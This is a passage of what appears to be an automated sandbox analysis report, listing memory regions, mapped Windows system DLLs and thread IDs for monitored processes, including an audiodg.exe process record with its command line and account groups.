	        start_va = 0x5a9ee80000
	          end_va = 0x5a9eefffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ee80000"
	        filename = ""

Region:
	              id = 2421
	        start_va = 0x5a9ef00000
	          end_va = 0x5a9ef7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ef00000"
	        filename = ""

Region:
	              id = 2422
	        start_va = 0x5a9ef80000
	          end_va = 0x5a9effffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ef80000"
	        filename = ""

Region:
	              id = 2423
	        start_va = 0x1e917980000
	          end_va = 0x1e917981fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917980000"
	        filename = ""

Region:
	              id = 2424
	        start_va = 0x1e917990000
	          end_va = 0x1e917990fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917990000"
	        filename = ""

Region:
	              id = 2425
	        start_va = 0x1e9179a0000
	          end_va = 0x1e9179a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e9179a0000"
	        filename = ""

Region:
	              id = 2426
	        start_va = 0x1e9179b0000
	          end_va = 0x1e9179b0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e9179b0000"
	        filename = ""

Region:
	              id = 2427
	        start_va = 0x1e9179c0000
	          end_va = 0x1e9179c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e9179c0000"
	        filename = ""

Region:
	              id = 2428
	        start_va = 0x1e918110000
	          end_va = 0x1e91819bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e918110000"
	        filename = ""

Region:
	              id = 2429
	        start_va = 0x1e9181a0000
	          end_va = 0x1e91829ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e9181a0000"
	        filename = ""

Region:
	              id = 2430
	        start_va = 0x7ffc063e0000
	          end_va = 0x7ffc06404fff
	     entry_point = 0x7ffc063e0000
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")

Region:
	              id = 2431
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 2432
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 2433
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 2434
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 2435
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 2436
	        start_va = 0x7ffbfe1a0000
	          end_va = 0x7ffbfe1dcfff
	     entry_point = 0x7ffbfe1a0000
	     region_type = mapped_file
	            name = "wmiprov.dll"
	        filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll")

Region:
	              id = 2437
	        start_va = 0x7ffc12f10000
	          end_va = 0x7ffc12f40fff
	     entry_point = 0x7ffc12f10000
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")

Region:
	              id = 2438
	        start_va = 0x7ffc0fbb0000
	          end_va = 0x7ffc0fbc0fff
	     entry_point = 0x7ffc0fbb0000
	     region_type = mapped_file
	            name = "wmiclnt.dll"
	        filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")

Region:
	              id = 2439
	        start_va = 0x1e9182a0000
	          end_va = 0x1e91869afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e9182a0000"
	        filename = ""

Region:
	              id = 2440
	        start_va = 0x7ffbfdba0000
	          end_va = 0x7ffbfdbe0fff
	     entry_point = 0x7ffbfdba0000
	     region_type = mapped_file
	            name = "mofd.dll"
	        filename = "\\Windows\\System32\\wbem\\mofd.dll" (normalized: "c:\\windows\\system32\\wbem\\mofd.dll")


Thread:
	id = 238
	os_tid = 0xd1c


Thread:
	id = 239
	os_tid = 0xd14


Thread:
	id = 240
	os_tid = 0xe74


Thread:
	id = 241
	os_tid = 0x7e8


Thread:
	id = 242
	os_tid = 0x808


Thread:
	id = 243
	os_tid = 0x3d0


Thread:
	id = 244
	os_tid = 0x314


Thread:
	id = 245
	os_tid = 0x4e4


Thread:
	id = 246
	os_tid = 0x360


Process:
	id = "14"
	image_name = "audiodg.exe"
	filename = "c:\\windows\\system32\\audiodg.exe"
	page_root = "0x12b31000"
	os_pid = "0x650"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "12"
	os_parent_pid = "0x348"
	cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0xa64"
	cur_dir = "C:\\Windows"
	os_username = "NT AUTHORITY\\Local Service"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xe], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xe], "NT SERVICE\\wscsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000c094" [0xc000000f], "LOCAL" [0x7]

Region:
	              id = 2518
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2519
	        start_va = 0xdf9e150000
	          end_va = 0xdf9e1cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e150000"
	        filename = ""

Region:
	              id = 2520
	        start_va = 0xdf9e200000
	          end_va = 0xdf9e3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e200000"
	        filename = ""

Region:
	              id = 2521
	        start_va = 0x2b852430000
	          end_va = 0x2b85244ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852430000"
	        filename = ""

Region:
	              id = 2522
	        start_va = 0x2b852450000
	          end_va = 0x2b852464fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852450000"
	        filename = ""

Region:
	              id = 2523
	        start_va = 0x7df5ff0c0000
	          end_va = 0x7ff5ff0bffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff0c0000"
	        filename = ""

Region:
	              id = 2524
	        start_va = 0x7ff6901f0000
	          end_va = 0x7ff690212fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6901f0000"
	        filename = ""

Region:
	              id = 2525
	        start_va = 0x7ff691150000
	          end_va = 0x7ff6911aefff
	     entry_point = 0x7ff691150000
	     region_type = mapped_file
	            name = "audiodg.exe"
	        filename = "\\Windows\\System32\\audiodg.exe" (normalized: "c:\\windows\\system32\\audiodg.exe")

Region:
	              id = 2526
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2527
	        start_va = 0x2b852580000
	          end_va = 0x2b85267ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852580000"
	        filename = ""

Region:
	              id = 2528
	        start_va = 0x2b852430000
	          end_va = 0x2b852436fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852430000"
	        filename = ""

Region:
	              id = 2529
	        start_va = 0x2b852440000
	          end_va = 0x2b85244ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852440000"
	        filename = ""

Region:
	              id = 2530
	        start_va = 0x2b852470000
	          end_va = 0x2b85252dfff
	     entry_point = 0x2b852470000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2531
	        start_va = 0x7ff6900f0000
	          end_va = 0x7ff6901effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6900f0000"
	        filename = ""

Region:
	              id = 2532
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 2533
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 2534
	        start_va = 0xdf9e400000
	          end_va = 0xdf9e47ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e400000"
	        filename = ""

Region:
	              id = 2535
	        start_va = 0x2b852850000
	          end_va = 0x2b85285ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852850000"
	        filename = ""

Region:
	              id = 2536
	        start_va = 0x7ffc0fa30000
	          end_va = 0x7ffc0fa9ffff
	     entry_point = 0x7ffc0fa30000
	     region_type = mapped_file
	            name = "mmdevapi.dll"
	        filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")

Region:
	              id = 2537
	        start_va = 0x7ffc10c90000
	          end_va = 0x7ffc10c9afff
	     entry_point = 0x7ffc10c90000
	     region_type = mapped_file
	            name = "avrt.dll"
	        filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")

Region:
	              id = 2538
	        start_va = 0x7ffc11ef0000
	          end_va = 0x7ffc12075fff
	     entry_point = 0x7ffc11ef0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 2539
	        start_va = 0x7ffc12440000
	          end_va = 0x7ffc12466fff
	     entry_point = 0x7ffc12440000
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")

Region:
	              id = 2540
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 2541
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 2542
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 2543
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 2544
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 2545
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 2546
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 2547
	        start_va = 0x2b852530000
	          end_va = 0x2b852536fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852530000"
	        filename = ""

Region:
	              id = 2548
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 2549
	        start_va = 0xdf9e480000
	          end_va = 0xdf9e4fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e480000"
	        filename = ""

Region:
	              id = 2550
	        start_va = 0x2b852540000
	          end_va = 0x2b852541fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852540000"
	        filename = ""

Region:
	              id = 2551
	        start_va = 0x2b852680000
	          end_va = 0x2b852807fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852680000"
	        filename = ""

Region:
	              id = 2552
	        start_va = 0x2b852860000
	          end_va = 0x2b852a61fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852860000"
	        filename = ""

Region:
	              id = 2553
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 2554
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 2555
	        start_va = 0xdf9e500000
	          end_va = 0xdf9e57ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e500000"
	        filename = ""

Region:
	              id = 2556
	        start_va = 0x2b852550000
	          end_va = 0x2b852551fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852550000"
	        filename = ""

Region:
	              id = 2557
	        start_va = 0x2b852560000
	          end_va = 0x2b852560fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852560000"
	        filename = ""

Region:
	              id = 2558
	        start_va = 0x2b852570000
	          end_va = 0x2b852570fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852570000"
	        filename = ""

Region:
	              id = 2559
	        start_va = 0x2b852810000
	          end_va = 0x2b852810fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852810000"
	        filename = ""

Region:
	              id = 2560
	        start_va = 0x2b852820000
	          end_va = 0x2b852820fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852820000"
	        filename = ""

Region:
	              id = 2561
	        start_va = 0x2b852a70000
	          end_va = 0x2b852bf0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852a70000"
	        filename = ""

Region:
	              id = 2562
	        start_va = 0x2b852c00000
	          end_va = 0x2b852cbffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852c00000"
	        filename = ""

Region:
	              id = 2563
	        start_va = 0x2b852cc0000
	          end_va = 0x2b8530bafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852cc0000"
	        filename = ""

Region:
	              id = 2564
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 2565
	        start_va = 0xdf9e580000
	          end_va = 0xdf9e5fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e580000"
	        filename = ""

Region:
	              id = 2566
	        start_va = 0xdf9e600000
	          end_va = 0xdf9e67ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e600000"
	        filename = ""

Region:
	              id = 2567
	        start_va = 0x7ffbff360000
	          end_va = 0x7ffbff3e7fff
	     entry_point = 0x7ffbff360000
	     region_type = mapped_file
	            name = "audioses.dll"
	        filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll")

Region:
	              id = 2568
	        start_va = 0x7ffc0efd0000
	          end_va = 0x7ffc0f105fff
	     entry_point = 0x7ffc0efd0000
	     region_type = mapped_file
	            name = "wintypes.dll"
	        filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")

Region:
	              id = 2569
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 2570
	        start_va = 0x2b852830000
	          end_va = 0x2b852830fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b852830000"
	        filename = ""

Region:
	              id = 2571
	        start_va = 0x7ffc0c1d0000
	          end_va = 0x7ffc0c252fff
	     entry_point = 0x7ffc0c1d0000
	     region_type = mapped_file
	            name = "audioeng.dll"
	        filename = "\\Windows\\System32\\AudioEng.dll" (normalized: "c:\\windows\\system32\\audioeng.dll")

Region:
	              id = 2572
	        start_va = 0x2b852840000
	          end_va = 0x2b852841fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b852840000"
	        filename = ""

Region:
	              id = 2573
	        start_va = 0x2b8530c0000
	          end_va = 0x2b853101fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b8530c0000"
	        filename = ""

Region:
	              id = 2574
	        start_va = 0x2b853110000
	          end_va = 0x2b853111fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b853110000"
	        filename = ""

Region:
	              id = 2575
	        start_va = 0x2b853120000
	          end_va = 0x2b853321fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b853120000"
	        filename = ""

Region:
	              id = 2576
	        start_va = 0x7ffbfea40000
	          end_va = 0x7ffbfebf7fff
	     entry_point = 0x7ffbfea40000
	     region_type = mapped_file
	            name = "wmalfxgfxdsp.dll"
	        filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll")

Region:
	              id = 2577
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 2578
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 2579
	        start_va = 0x7ffbff990000
	          end_va = 0x7ffbffa9cfff
	     entry_point = 0x7ffbff990000
	     region_type = mapped_file
	            name = "mfplat.dll"
	        filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll")

Region:
	              id = 2580
	        start_va = 0x7ffc023c0000
	          end_va = 0x7ffc023eafff
	     entry_point = 0x7ffc023c0000
	     region_type = mapped_file
	            name = "rtworkq.dll"
	        filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll")

Region:
	              id = 2581
	        start_va = 0xdf9e680000
	          end_va = 0xdf9e6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e680000"
	        filename = ""

Region:
	              id = 2582
	        start_va = 0xdf9e700000
	          end_va = 0xdf9e77ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000df9e700000"
	        filename = ""

Region:
	              id = 2583
	        start_va = 0x2b853330000
	          end_va = 0x2b853666fff
	     entry_point = 0x2b853330000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2584
	        start_va = 0x2b853670000
	          end_va = 0x2b853670fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b853670000"
	        filename = ""

Region:
	              id = 2585
	        start_va = 0x2b853680000
	          end_va = 0x2b853680fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b853680000"
	        filename = ""

Region:
	              id = 2586
	        start_va = 0x2b853690000
	          end_va = 0x2b853690fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002b853690000"
	        filename = ""

Region:
	              id = 2587
	        start_va = 0x2b8536a0000
	          end_va = 0x2b8536a1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002b8536a0000"
	        filename = ""

Region:
	              id = 2588
	        start_va = 0x7ffc0a570000
	          end_va = 0x7ffc0a5d8fff
	     entry_point = 0x7ffc0a570000
	     region_type = mapped_file
	            name = "audiokse.dll"
	        filename = "\\Windows\\System32\\AUDIOKSE.dll" (normalized: "c:\\windows\\system32\\audiokse.dll")


Thread:
	id = 267
	os_tid = 0x2d0


Thread:
	id = 268
	os_tid = 0x2cc


Thread:
	id = 269
	os_tid = 0x138


Thread:
	id = 270
	os_tid = 0xbec


Thread:
	id = 271
	os_tid = 0xc78


Thread:
	id = 272
	os_tid = 0xbfc


Thread:
	id = 273
	os_tid = 0xd90


Thread:
	id = 274
	os_tid = 0xdbc


Thread:
	id = 276
	os_tid = 0xdc8


Thread:
	id = 277
	os_tid = 0xda8